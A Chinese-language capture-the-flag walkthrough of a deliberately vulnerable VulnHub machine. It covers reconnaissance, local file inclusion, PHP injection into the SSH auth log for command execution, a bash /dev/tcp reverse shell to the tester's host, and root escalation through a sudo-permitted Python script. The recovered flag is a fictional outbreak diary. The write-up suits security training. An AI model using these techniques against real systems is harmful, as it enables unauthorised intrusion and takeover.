近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。
靶机下载
https://www.vulnhub.com/entry...
信息收集
首先扫描内网,发现目标主机ip arp-scan -l
使用nmap对目标ip进行扫描
nmap -sV -A -T4 192.168.1.20
发现22和80端口是开放的,分别是ssh和http服务
使用http协议访问目标网站
http://192.168.1.20/
浏览该网站,主要发现下面几点
·发现该网站存在这么一个url,存在LFI(本地文件包含)
http://192.168.1.20/index.php...
·在about us页面中发现了一个邮箱,很可能是某个地方会用到的用户名
·RESEARCH页面中有很多的单词,如果有需要的话可以用于生成字典
漏洞利用
尝试了一下常用的路径并没有什么发现,于是在github上的SecLists中找到了LFI-JHADDIX.txt文件,使用burpsuite中的intruder进行尝试,终于发现了一个可以查看的路径(SecList中还有其他文件,有兴趣的可以看一下)
https://github.com/danielmies...(Fuzzing路径下)
抓包,然后右键发送到intruder
/var/log/lastlog 能访问,但是没有什么有用的数据
/var/log/auth.log 重定向回了首页(注意这个URL)
查看/var/log/auth.log时重定向回首页,说明应该隐藏了什么东西,我们查看一下响应数据包
点击HTTP history,找到刚刚发的包,点击response,可以发现返回的数据包中,确实存在日志
也可以使用curl来请求
curl -is http://192.168.1.20/?file=/va...
注:以下操作之前需要保存快照,如果长时间没有成功注入并执行任意命令,建议恢复快照;并且一旦出现这种情况,即curl命令没有返回结果,需要恢复快照,重新操作。
为了进一步测试,尝试登陆ssh,再读取一遍日志发现ssh的操作被记录到日志里
既然ssh的操作可以被记录到日志中,那么可以尝试是否能够通过日志注入+文件包含来执行任意命令
尝试注入一段php代码
ssh ''@192.168.1.20(不能用双引号,并且?php中间不能有空格)
查看一下最新的日志
curl -is 'http://192.168.1.20/index.php...'
用户名被隐藏掉了
尝试通过php代码来执行命令ls
curl -is 'http://192.168.1.20/index.php...'
发现该路径下有一个xxxlogauditorxxx.py的python脚本
既然可以执行任意命令,我们尝试一下反弹一个持久化的shell
各种环境下的反弹shell方法可以查看该网站
http://www.zerokeeper.com/exp...
首先设置端口监听
nc -nlvp 9999
尝试使用
curl -is 'http://192.168.1.20/index.php... bash -i >& /dev/tcp/192.168.1.66/9999 0>&1'
通过报错信息发现,必须使用url编码才能被识别
编码后
curl -is 'http://192.168.1.20/index.php...'
并没有成功反弹
最简单的方法是使用-e,也没有成功
继续尝试不能使用-e的选项
curl -is 'http://192.168.1.20/index.php...'
反弹shell成功
可以使用sudo权限不需要密码执行xxxlogauditorxxx.py,
查看一下该文件
这是一个超长的python脚本,里边有很大一部分内容使用了base64编码
在这个python脚本中,我们可以执行命令,当我们运行/var/log/auth.log | id命令的时候,我们以root身份来执行
于是我们就可以通过python脚本和/var/log/auth.log |命令进行配合获得root权限
在/root目录下找到了flag.png文件
/var/log/auth.log | ls /root
把他复制到公共目录,然后使用wget下载下来
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png
wget http://192.168.1.20/?file=fla...
使用cat查看一下发现有很多乱码和一部分使用base64编码的内容
flag后面的内容使用的base64编码,这应该就是我们要寻找的内容
对这段文字进行解码,That’s right! It’s great!
october 1, 2017.
We have or first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!
October 3, 2017.
The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.
October 3, 2017.
Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.
October 4, 2017.
Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.
October 7, 2017.
The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.
October 8, 2017.
Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.
October 10, 2017.
Isolated and exposed subject are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.
October 11, 2017.
Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.
October 13, 2017.
We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous death due to the subjects displaying extreme reactions the the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial laws in the event of an outbreak to the general population.
--Document scheduled to be shredded on October 15th after PSA.